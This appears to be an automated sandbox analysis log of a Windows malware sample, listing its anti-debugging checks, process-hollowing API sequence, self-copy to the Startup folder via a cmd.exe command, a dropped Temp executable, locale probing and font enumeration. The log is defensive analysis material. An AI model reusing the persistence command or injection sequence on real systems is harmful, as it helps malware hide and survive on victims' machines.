                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: 17_2_0041DEB4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0041DEB4

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeMemory written: C:\Users\user\Desktop\0XzeMRyE1e.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_00403170 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,13_2_00403170
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /c Copy "C:\Users\user\Desktop\0XzeMRyE1e.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\Desktop\0XzeMRyE1e.exe C:\Users\user\Desktop\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeProcess created: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe "C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0XzeMRyE1e.exeJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeCode function: 13_2_004034E0 ShellExecuteExW,WaitForSingleObject,13_2_004034E0
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,17_2_00C7F0DD
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,17_2_00C780DB
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,17_2_00C7D87F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,17_2_00C77815
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,17_2_00C7F9CB
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,17_2_00C7F1E4
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,17_2_00C7F9FF
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,17_2_00C7918A
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,17_2_00C792A1
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,17_2_00C783A1
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,17_2_00C793AD
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,17_2_00C7FB3E
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,17_2_00C79339
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,17_2_00C7957F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,17_2_00C796E3
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,17_2_00C77E83
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,17_2_00C796A7
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,17_2_00C79640
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,17_2_00C7EF8D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,17_2_00432021
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0042D026
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,17_2_0042D11B
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,17_2_0042D1C2
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,17_2_0042D21D
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __EH_prolog3,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memset,LocalFree,17_2_0041628C
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,17_2_0042D3EE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,17_2_0042D4AE
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,17_2_0042D551
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,17_2_0042D515
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,17_2_0042B94F
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,17_2_0042C909
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,17_2_0042CBF7
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,17_2_00422C07
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,17_2_0042BCAD
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoA,17_2_00423EF8
                        Source: C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,17_2_00431F47
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Users\user\Desktop\0XzeMRyE1e.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\0XzeMRyE1e.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
